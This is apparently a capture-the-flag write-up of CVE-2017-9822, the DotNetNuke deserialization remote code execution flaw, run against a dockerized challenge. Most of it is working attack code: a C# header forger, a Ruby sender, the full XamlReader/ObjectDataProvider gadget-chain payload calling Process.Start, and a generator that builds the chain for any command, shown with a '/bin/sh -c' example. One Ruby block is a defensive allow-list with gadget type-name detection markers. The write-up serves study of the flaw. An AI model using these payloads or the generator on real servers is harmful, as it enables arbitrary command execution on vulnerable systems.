# CVE-2017-9822 DotNetNuke RCE

## Download

- https://github.com/abhisek/pwnworks/tree/master/challenges/dotnet-deserialization

```
$ docker build -t dotnet-serial-pwn .
$ docker run --rm --name dotnet-serial-pwn -p 9000:9000 dotnet-serial-pwn
```

If the build fails, convert the line endings of the checked-out files to LF (CRLF endings break the scripts inside the container).

![image](https://hackmd.io/_uploads/Hy8ICeJyZl.png)

## Theory

- https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6

In CVE-2017-9822 (DNN Platform up to 9.1.0) the `DNNPersonalization` cookie is an XML document whose `<item>` elements carry a `type` attribute, and the server passes that attacker-chosen type name to `XmlSerializer` to deserialize the element body. Naming `System.Data.Services.Internal.ExpandedWrapper` of `XamlReader` and `ObjectDataProvider` makes the deserializer build an `ObjectDataProvider` that calls `XamlReader.Parse` on attacker-supplied XAML, and that XAML declares a second `ObjectDataProvider` which calls `Process.Start`. The challenge moves the same primitive into the `Authorization` header: the header is base64 of `<AuthData><Item key="..." type="...">...</Item></AuthData>`, and the `type` attribute selects the deserializer.

## Exploitation

Code to forge the auth header. The server checks for a token inside a `Hashtable` serialized with `BinaryFormatter`; that stream is base64-encoded into an `<Item type="BinaryType">`, and the whole XML is base64-encoded once more to form the `Authorization` value:

```C#
using System;
using System.Collections;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;

class MakeAuthHeader
{
    static void Main()
    {
        // The token the server checks for
        Hashtable h = new Hashtable();
        h["token"] = "5daba5b0885a65b222216bf46b083538";

        // Serialize the Hashtable with BinaryFormatter -> byte[]
        BinaryFormatter bf = new BinaryFormatter();
        byte[] serialized;
        using (MemoryStream ms = new MemoryStream())
        {
            bf.Serialize(ms, h);
            serialized = ms.ToArray();
        }

        // Inner base64 (carries the BinaryFormatter payload)
        string innerBase64 = Convert.ToBase64String(serialized);

        // Wrap innerBase64 in the XML envelope the server expects
        string xml = $"<AuthData><Item key=\"basic\" type=\"BinaryType\">{innerBase64}</Item></AuthData>";

        // Base64 the whole XML -> this is the Authorization header value to use
        string header = Convert.ToBase64String(Encoding.UTF8.GetBytes(xml));
        Console.WriteLine(header);
    }
}
```

![image](https://hackmd.io/_uploads/HyqQYfJkWl.png)

```
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
```

![image](https://hackmd.io/_uploads/ByDjFz11bx.png)

![image](https://hackmd.io/_uploads/B14htMJ1-e.png)

```http
POST /products HTTP/1.1
Host: 127.0.0.1:9000
Authorization: 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
Content-Type: application/xml
Content-Length: 94

<Product><Name>Ptest</Name><Description>t</Description><ImageURL>NA</ImageURL></Product>
```

![image](https://hackmd.io/_uploads/ByAHlLx1-e.png)

![image](https://hackmd.io/_uploads/rJLVx8xy-e.png)
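Before sending a forged header it is worth seeing exactly what the server will be asked to deserialize, and the same check is the allow-list a hardened server should apply before touching any deserializer. The Ruby below is an added example written for this page, not code from the write-up or the pwnworks challenge. It assumes the envelope shown above (`AuthData/Item` with `key` and `type`, base64 inside and out), assumes that `type="BinaryType"` routes to `BinaryFormatter` and any other value to `XmlSerializer`, and works on constructed sample headers rather than the real token-bearing one: the benign sample is only the 17-byte `BinaryFormatter` stream header plus dummy bytes, not a serialized `Hashtable`.

```ruby
require 'base64'
require 'rexml/document'

# The 17-byte header every BinaryFormatter stream starts with:
# record type 0x00 (SerializedStreamHeader), RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0.
BINARY_FORMATTER_MAGIC = "\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00".b

# Type names of well-known XmlSerializer gadget chains; any of them in an
# attacker-controlled "type" attribute is an exploitation attempt, not a client bug.
GADGET_TYPE_MARKERS = [
  'System.Data.Services.Internal.ExpandedWrapper',
  'System.Windows.Data.ObjectDataProvider',
  'System.Windows.Markup.XamlReader',
].freeze

# Unwrap one header and return one hash per <Item> describing what the server would do.
# Assumed server behaviour (inferred from the write-up): type="BinaryType" => BinaryFormatter
# over base64(inner text); anything else => XmlSerializer with the attacker-chosen type name.
def inspect_auth_header(header)
  xml = Base64.decode64(header).force_encoding('UTF-8')
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '/AuthData/Item').map do |item|
    type  = item.attributes['type'].to_s
    entry = { key: item.attributes['key'].to_s, type: type }
    if type == 'BinaryType'
      raw = Base64.decode64(item.text.to_s.strip)
      entry[:deserializer] = 'BinaryFormatter'
      entry[:binary_formatter_stream] = raw.b.start_with?(BINARY_FORMATTER_MAGIC)
      entry[:payload_bytes] = raw.bytesize
    else
      entry[:deserializer] = 'XmlSerializer'
      entry[:gadget] = GADGET_TYPE_MARKERS.any? { |m| type.include?(m) }
    end
    entry
  end
end

# The allow-list a hardened server would apply before touching any deserializer:
# exactly the expected type, a stream that at least looks like BinaryFormatter output,
# and fail closed on anything that does not parse. (Even then BinaryFormatter itself is
# unsafe on untrusted input; the real fix is not to deserialize the header at all.)
def safe_auth_header?(header)
  entries = inspect_auth_header(header)
  !entries.empty? && entries.all? { |e| e[:type] == 'BinaryType' && e[:binary_formatter_stream] }
rescue StandardError
  false
end

# --- constructed samples (not captured traffic) ---
# Benign shape: the BinaryFormatter header followed by a few dummy bytes, standing in
# for the serialized Hashtable produced by the C# program above.
BENIGN_INNER  = Base64.strict_encode64(BINARY_FORMATTER_MAGIC + "\x04\x01\x00\x00\x00".b)
BENIGN_HEADER = Base64.strict_encode64(
  "<AuthData><Item key=\"basic\" type=\"BinaryType\">#{BENIGN_INNER}</Item></AuthData>"
)
# Attack shape: the type attribute names the ExpandedWrapper gadget (assembly qualifiers shortened).
EVIL_TYPE = 'System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework],' \
            '[System.Windows.Data.ObjectDataProvider, PresentationFramework]], System.Data.Services'
EVIL_HEADER = Base64.strict_encode64(
  "<AuthData><Item key=\"AAA\" type=\"#{EVIL_TYPE}\"><ExpandedWrapperOfXamlReaderObjectDataProvider/></Item></AuthData>"
)

if __FILE__ == $0
  [BENIGN_HEADER, EVIL_HEADER].each do |h|
    p inspect_auth_header(h)
    puts "accepted by allow-list: #{safe_auth_header?(h)}"
  end
end
```

Run it against the header printed by `MakeAuthHeader` to confirm the inner stream really starts with the `BinaryFormatter` header before spending time on the server; `GADGET_TYPE_MARKERS` is the substring list a WAF rule or log search for this CVE would key on.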
![image](https://hackmd.io/_uploads/BylBgLgkbe.png)

Sender script: it base64-encodes the payload XML (`testxml.xml`, or the file given as the first argument) into the `Authorization` header and posts `product.xml` as the request body. The port is set to 9000 to match the `docker run` above.

```ruby
require 'uri'
require 'net/http'
require 'base64'

# Read the payload XML and base64-encode it; this is the raw Authorization value
def get_payload()
  data = File.binread(ARGV[0] || "testxml.xml")
  return Base64.strict_encode64(data)
end

if __FILE__ == $0
  # The container is published with -p 9000:9000 above
  uri = ::URI.parse("http://127.0.0.1:9000/products")
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Post.new(uri.path)
  request["Authorization"] = get_payload()
  request["Content-Type"] = "application/xml"
  # Any well-formed product body; the payload fires when the server deserializes the header
  request.body = File.binread("product.xml")
  res = http.request(request)
  puts res.body
end
```

`testxml.xml`, the gadget chain: `XmlSerializer` builds the `ExpandedWrapper`, whose `ProjectedProperty0` is an `ObjectDataProvider` that calls `XamlReader.Parse` on the string in `anyType`; the parsed XAML contains a second `ObjectDataProvider` that calls `Process.Start("touch", "/tmp/PWN")`. The XAML is carried as a string parameter, not as child XML, so it must be entity-escaped exactly once (`&lt;`, `&gt;`, `&quot;`); leaving it unescaped or escaping it twice makes `XamlReader.Parse` fail silently from the attacker's side.

```xml
<?xml version="1.0"?>
<AuthData>
  <Item key="AAA" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
    <ExpandedWrapperOfXamlReaderObjectDataProvider>
      <ExpandedElement/>
      <ProjectedProperty0>
        <MethodName>Parse</MethodName>
        <MethodParameters>
          <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
            &lt;ResourceDictionary
              xmlns=&quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&quot;
              xmlns:x=&quot;http://schemas.microsoft.com/winfx/2006/xaml&quot;
              xmlns:System=&quot;clr-namespace:System;assembly=mscorlib&quot;
              xmlns:Diag=&quot;clr-namespace:System.Diagnostics;assembly=system&quot;&gt;
              &lt;ObjectDataProvider x:Key=&quot;LaunchCmd&quot; ObjectType=&quot;{x:Type Diag:Process}&quot; MethodName=&quot;Start&quot;&gt;
                &lt;ObjectDataProvider.MethodParameters&gt;
                  &lt;System:String&gt;touch&lt;/System:String&gt;
                  &lt;System:String&gt;/tmp/PWN&lt;/System:String&gt;
                &lt;/ObjectDataProvider.MethodParameters&gt;
              &lt;/ObjectDataProvider&gt;
            &lt;/ResourceDictionary&gt;
          </anyType>
        </MethodParameters>
        <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
      </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
  </Item>
</AuthData>
```
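The payload above hard-codes `touch /tmp/PWN`. The generator below is an added example written for this page (not from the write-up or the pwnworks repository) that builds the same ExpandedWrapper/XamlReader/ObjectDataProvider chain for any program and argument string, takes care of the two levels of XML escaping, and round-trips the result to check that the XAML the server will hand to `XamlReader.Parse` is well-formed. It assumes the same `AuthData/Item` envelope and the same gadget type string as `testxml.xml`; the two `System:String` parameters select the `Process.Start(string, string)` overload, so all arguments go in one string.

```ruby
require 'base64'
require 'rexml/document'

# Assumed to match testxml.xml above: the XmlSerializer gadget type name
EXPANDED_WRAPPER_TYPE =
  'System.Data.Services.Internal.ExpandedWrapper`2[' \
  '[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],' \
  '[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], ' \
  'System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'

# Escape text for use inside an XML element. Applied twice on purpose: once while
# building the XAML itself, once more when the XAML is embedded as a string in <anyType>.
def xml_escape(s)
  s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;').gsub('"', '&quot;')
end

# XAML ResourceDictionary whose ObjectDataProvider calls Process.Start(program[, arguments]).
# Process.Start has no overload taking three strings, so extra arguments must be joined
# into the single `arguments` string by the caller.
def build_xaml(program, arguments = nil)
  params = [program, arguments].compact
                               .map { |p| "<System:String>#{xml_escape(p)}</System:String>" }
                               .join
  '<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" ' \
  'xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" ' \
  'xmlns:System="clr-namespace:System;assembly=mscorlib" ' \
  'xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">' \
  '<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">' \
  "<ObjectDataProvider.MethodParameters>#{params}</ObjectDataProvider.MethodParameters>" \
  '</ObjectDataProvider></ResourceDictionary>'
end

# The full AuthData document in the shape of testxml.xml (key "AAA" is arbitrary; the
# server only dispatches on the type attribute in this challenge).
def build_auth_xml(program, arguments = nil, key: 'AAA')
  <<~XML
    <?xml version="1.0"?>
    <AuthData>
      <Item key="#{key}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="#{EXPANDED_WRAPPER_TYPE}">
        <ExpandedWrapperOfXamlReaderObjectDataProvider>
          <ExpandedElement/>
          <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
              <anyType xsi:type="xsd:string">#{xml_escape(build_xaml(program, arguments))}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
          </ProjectedProperty0>
        </ExpandedWrapperOfXamlReaderObjectDataProvider>
      </Item>
    </AuthData>
  XML
end

# The value to put in the Authorization header
def build_auth_header(program, arguments = nil)
  Base64.strict_encode64(build_auth_xml(program, arguments))
end

# Round trip: decode the header, pull the XAML string back out of <anyType> (REXML
# un-escapes the entities), parse that XAML as XML and return the Process.Start parameters.
# Raises if either layer is not well-formed, which is exactly the case XamlReader.Parse
# would reject on the server.
def extract_xaml_params(header)
  doc   = REXML::Document.new(Base64.decode64(header).force_encoding('UTF-8'))
  xaml  = REXML::XPath.first(doc, '//anyType').text
  inner = REXML::Document.new(xaml)
  odp   = inner.root.elements.to_a.first            # <ObjectDataProvider>
  odp.elements.to_a.first.elements.to_a.map(&:text) # <System:String> values
end

if __FILE__ == $0
  program, arguments = ARGV[0] || 'touch', ARGV[1] || '/tmp/PWN'
  header = build_auth_header(program, arguments)
  warn "Process.Start(#{extract_xaml_params(header).inspect})"
  puts header
end
```

`ruby gen.rb /bin/sh '-c "id > /tmp/o"'` prints a header that can be pasted straight into the request above; writing `build_auth_xml(...)` to `testxml.xml` instead feeds the sender script unchanged.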